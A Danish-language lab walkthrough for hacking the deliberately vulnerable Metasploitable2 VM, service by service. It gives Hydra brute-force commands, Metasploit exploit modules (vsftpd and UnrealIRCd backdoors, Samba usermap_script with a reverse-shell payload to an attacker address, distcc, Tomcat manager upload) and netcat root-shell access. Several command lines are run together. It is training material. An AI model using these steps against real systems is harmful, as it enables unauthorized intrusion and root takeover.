- Metasploitable2 Complete Overview
- Udnyttelse af alle porte i forskellige teknikker :
- 22-SSH
- 23-TELNET
- 25-SMTP
- Metode 2
- 139&445 Netbios-SSN
- 1099-Java-RMI
- Exploiting java-RMI-server
- 1524-BINDSHELL
- Exploitation
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Udnyttelse af port 3632 ved hjælp af distcc-exec
- Exploiting PostgreSQL with postgre_payload
- 5900-VNC
- 6000-X11
- Udnyttelse af port 6000 ved hjælp af ssh
- 6667 & 6697 UnrealIRCD
- Metode 1: på port 6667
- Metode 2: På port 6697
- 8180-TOMCAT
- Udnyttelse af Apache-Tomcat
- 8787-Ruby-drb
Metasploitable2 Complete Overview
Metasploitable er en bevidst sårbar virtuel Linux-maskine.
Denne virtuelle maskine kan bruges til at gennemføre sikkerhedstræning, teste sikkerhedsværktøjer og øve sig i almindelige penetrationstestteknikker.
Installation og konfiguration
Vi er her for at udnytte Metasploitable 2 (Damn vulnerable machine for penetration testing)
Hent denne Metasploiable2-maskine fra https://information.rapid7.com/download-metasploitable-2017.html
Installationsproces:
- Åbn VirtualBox og klik på “New” knappen for at oprette en ny virtuel maskine
- Typ navnet på den virtuelle maskine(Metasploitable2)
- Alloker mængden af hukommelse(helst, men ikke under 512mb)
- Vælg Use an existing hard disk file
- Vælg vmdk filen, som du har hentet fra Rapid7
- Klik på Create…!!! Succesfuldt installeret Metasploitable2, Nu er det tid til at konfigurere netværksindstillingerne.
Efter installationen ændrer du indstillingerne for netværkskortet som følger :
In-Network Setting: Indstillinger/Netværk/Adapter Vælg Ethernet eller Trådløs
I fanen Avanceret Vælg: Promiscuous Mode som Allow All
Boot op Metasploitable2-maskinen og prøv at logge ind med de givne legitimationsoplysninger på Banner…!!!!
Find maskinens IP-adresse ved at bruge følgende kommando i terminal
ifconfig
Det er alt for opsætning….Lad os begynde at hacke…
Scanning
Scanning af Matasploitable 2
Som vi bemærkede, er maskinens IP-adresse 192.168.0.130
Lad os begynde at scanne med Nmap, som er en del af Kali Linux
nmap -sV -p- 192.168.0.130
Udnyttelse af alle porte i forskellige teknikker :
Metode 1:
Login med Anonymous som brugernavn og ingen adgangskode.
Hvis du har brug for mere info om Anonymous FTP kan du finde det her.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Metode 2 :
Gennem Brute-force med Hydra, men du skal have en brugerdefineret liste over brugernavne og adgangskoder.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
Den vil tage hvert brugernavn og password fra de givne filer og forsøge at logge ind på FTP-tjenesten for målet.
Når du har fundet legitimationsoplysningerne, kan du logge direkte ind.
Når du er logget ind på en brugerkonto, kan du få root-adgang ved at foretage Privilege Escalation.
Metode 3 :
Udnyttelse af FTP via Metasploit framework
åbne Metasploit framework konsol og søge efter vsftpd Backdoor exploit
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Godt tillykke, du fik root-adgang
22-SSH
Secure Shell (SSH) er en kryptografisk netværksprotokol til at betjene netværkstjenester sikkert over et usikkert netværk.
Udnyttelse af SSH i forskellige teknikker
Metode 1
Kracking af brugernavn og adgangskode med Hydra
Hydra er et indbygget værktøj i Kali-Linux, der bruges til Brute force-angreb er en forsøgs- og fejlmetode, der bruges af applikationsprogrammer til at afkode krypterede data såsom adgangskoder eller Data Encryption Standard (DES)-nøgler, gennem udtømmende anstrengelser (ved hjælp af brute force) i stedet for at anvende intellektuelle strategier.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Metode 2
Åbn Metasploit framework
Åbn terminal og skriv disse kommandoer :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
indstil denne auxiliary og se, hvad den kræver.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Sæt foruddefineret Brugernavne liste og Adgangskoder Liste
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
Det vil tage tid-baseret dine brugernavne og adgangskoder Liste og Det vil Notify med brugernavn: adgangskode og logge ind med disse legitimationsoplysninger.
ssh username@targetipaddress
Du har brugeradgang, kan ikke udføre alle opgaverne, så prøv at få root-adgang ved at gøre Privilege escalation.
23-TELNET
Telnet er en simpel, tekstbaseret netværksprotokol, der bruges til at få adgang til fjerncomputere over TCP/IP-netværk som f.eks. internettet. Telnet blev oprettet og lanceret i 1969, og historisk set kan man sige, at det var det første internet.
telnet <target IP Address> --> 192.168.0.130
Som standard vil den Grab Metasploitable 2 banner, det viser, at Login med msfadmin/msfadmin for at komme i gang. Bare indtast disse legitimationsoplysninger, så er du inde.
25-SMTP
SMTP er en del af applikationslaget i TCP/IP-protokollen. Ved hjælp af en proces, der kaldes “store and forward”, flytter SMTP din e-mail på og på tværs af netværk. Den arbejder tæt sammen med noget, der kaldes Mail Transfer Agent (MTA), for at sende din kommunikation til den rigtige computer og e-mail-indbakke.
Metode 1:
Ved hjælp af Metasploit
Start Metasploit ved at udføre kommandoerne
service postgresql startmsfconsole -qsearch smtp_version
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP står for Simple Mail Transport Protocol og er en server-til-server-protokol og fører en lokal database over de brugere, som den skal sende og modtage e-mails til.
SMTP har et sæt af kommandoer. Vi vil oprette forbindelse til vores mål med “netcat” gennem port 25 og forsøge at erhverve denne database e-mails.
Åbn en ny terminal, og skriv:
nc 192.168.0.130 25
Nu er forbindelsen etableret, du kan verificere ved hjælp af “SMTP”-kommandoerne
vrfy (Dette er en ikke-interaktiv shell)
For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Metode 2
Vejledning af smtp_enum
Dette kan gøres af Metasploit
search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Denne metode bruger opregning til at finde frem til denne liste over brugere i SMTP-tjenesten.
Sidst kan NetCat være nyttigt for at få en omvendt forbindelse med denne bruger.
139&445 Netbios-SSN
Samba er et open source-projekt, der er meget udbredt på Linux- og Unix-computere, så de kan arbejde med Windows-fil og -udskriftstjenester.
Vi kan endda bruge Samba som en Active-server til at håndtere login, godkendelse og adgangskontrol for et Windows-netværk.
Søg efter exploit
use exploit/multi/samba/usermap_script
show optionsSet RHOST192.168.0.130 (Target IP address)
Sæt payload
Show payloadsSet payload cmd/unix/reverse
Sæt nødvendige argumenter for payload
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Kontroller, når alle krævede argumenter er udfyldt
exploit
exploit
1099-Java-RMI
Remote Method Invocation (RMI) er en API, der gør det muligt for et objekt at påkalde en metode på et objekt, der findes i et andet adresseområde, som kan være på den samme maskine eller en fjernmaskine.
Exploiting java-RMI-server
søg efter exploit
search java_rmi_server
Vælg exploit efter deres rang. f.eks. fungerer “excellent” bedre end “normal”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Vi har fået adgang til målmaskinen.
1524-BINDSHELL
Bind shell er en type shell, hvor målmaskinen åbner en kommunikationsport eller en lytter på offermaskinen og venter på en indgående forbindelse. Angriberen opretter derefter forbindelse til offermaskinens lytter, som derefter fører til udførelse af kode eller kommando på serveren.
Exploitation
Det er en root shell, så vi kan oprette forbindelse via netcat-tjenesten.
nc <target ip address> 1524
Godt tillykke, du er en root-bruger nu.
2121-ProFTPD
Hvor du udnytter denne port skal du have loginoplysninger, så som vi kender metoden få det gennem Brute-force-teknik, Vi kan få adgang til ProFTPd med telnet, Vi bruger her bruger: user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
Det er en normal bruger, Prøv Privilege Escalation for at få root kontrol.
3306-MYSQL
Metode 1:
Søg efter exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
I nogle tilfælde kan der være en chance for at have en tom adgangskode til MySQL. Så vi kan udnytte det direkte.
Bemærk: som standard viser den BLANK_PASSWORDS som false, sæt den til true.
set BLANK_PASSWORDS as true
Metode:2
I denne metode vil vi udnytte MySQL ved at bruge denne kommando, der giver brugernavnet som root og målets IP.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc er et værktøj til at fremskynde kompileringen af kildekode ved hjælp af distribueret databehandling over et computernetværk. Med den rigtige konfiguration
distcc kan reducere et projekts kompileringstid dramatisk
Udnyttelse af port 3632 ved hjælp af distcc-exec
Åbn msfconsole og søg efter distcc_exec
search distcc_execshow options
Sæt de nødvendige argumenter for at udnytte
set RHOSTS <target-ip>exploit
Vi fik Shell-adgang…Prøv at lave privilege escalation for Higher privilege
Exploiting PostgreSQL with postgre_payload
Open msfconsole & search for postgres_payload
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Sæt nødvendige argumenter for exploit
set RHOSTS <target-ip>
Som standard, den vil bruge brugernavn som postgres
exploit
Successfully logged in postgresql…Lad os få en shell til at gøre flere ting…
Prøv at lave privilege escalation…God fornøjelse med at lære..!!!
5900-VNC
Åbn msfconsole og søg efter exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Denne metode bruges til at udnytte VNC-software hostet på Linux- eller Unix- eller Windows-operativsystemer med autentificeringssårbarhed.
Try to connect vnc with that password
Open Vnc Viewer in Terminal &Typ IP-adressen og opret forbindelse
en login prompt popup og beder om at angive legitimationsoplysninger
Derpå indtastes adgangskoden og klik på OK.
Voilaaa…!!!! du fik adgang…Jeg ved, hvad du tænker lige nu…Lad være med at rode med tingene rundt..Happy Learning.
6000-X11
The X Window System (aka X) er et vinduessystem til bitmap-skærme, som er almindeligt på UNIX-baserede operativsystemer. X udgør den grundlæggende ramme for et GUI-baseret miljø.
Den eksterne X11-server accepterer forbindelser fra alle steder, hvor man kan få en internetforbindelse. Den er ansvarlig for adgangen til grafikkortet, input-enhederne og skærmen på enten computeren eller den trådløse enhed.
Udnyttelse af port 6000 ved hjælp af ssh
ssh -X -l msfadmin 192.168.0.122
I ovenstående kommando aktiverer ‘X’ alle ports forwarding, ved at angive brugernavn og målets IP giver os shell
6667 & 6697 UnrealIRCD
UnrealIRCd er en Open Source IRC Server, der har tjent tusindvis af netværk siden 1999. Den kører på Linux, OS X og Windows
UnrealIRCd er en meget avanceret IRCd med et stærkt fokus på modularitet, en avanceret og meget konfigurerbar konfigurationsfil. Nøglefunktioner omfatter SSL
UnrealIRCd er en af de mest populære og fuldt udbyggede IRC-dæmoner og bruges på det største antal IRC-servere
Denne server beskrives som havende muligvis de fleste sikkerhedsfunktioner af alle IRC-servere.
Anvendte protokoller: Internet Relay Chat
Lad os udnytte denne IRC-server.
Metode 1: på port 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Sæt de nødvendige argumenter for exploit
set RHOSTS <target-ip>
Der tildeles som standard 6667 portnummer til exploit
run (or) exploit
Heyyy…Vi fik rod…Vi lever på kanten…
Metode 2: På port 6697
Brug ovenstående exploit og indstil de nødvendige argumenter
- Denne gang indstilles port som 6697
set RHOSTS <target-ip>set RPORT 6697
Og anden gang fik vi også root…Prøv at udnytte dette… God læring
8180-TOMCAT
Apache Tomcat er en open source-implementering af Java Servlet-, JavaServer Pages-, Java Expression Language- og WebSocket-teknologierne. Tomcat tilbyder et “rent Java” HTTP-webservermiljø, hvor Java-kode kan køre.
Udnyttelse af Apache-Tomcat
Det kan gennemføres i to trin:
Åbn msfconsole & søg efter tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Exploit vil tildele standard brugernavne & adgangskoder lister. Efter indstilling af argumenterne til exploit Type exploit (eller) run
run
Tag det samme brugernavn og password og giv det til den næste exploit.
søg efter tomcat manager exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Sæt RHOSTS, RPORT og HttpPassword, HttpUsername, som vi fik fra tomcat login exploit, og kør derefter exploit’et.
msfconsole kunne tildele den passende payload til en exploit, Det er derfor vi fik meterpreter…
8787-Ruby-drb
dRuby er et distribueret objektsystem til Ruby. Det er skrevet i ren Ruby og bruger dets protokol.
Der er ikke brug for nogen tillægstjenester ud over dem, der leveres af Ruby-køretiden, såsom TCP-soketter.
search drb_remote_codeexec
Sæt de nødvendige argumenter for at udnytte
show optionsset RHOSTS <target-ip>exploit (or) run
Kongratulation, du har fået root shell-adgang … prøv at bruge nogle shell-kommandoer.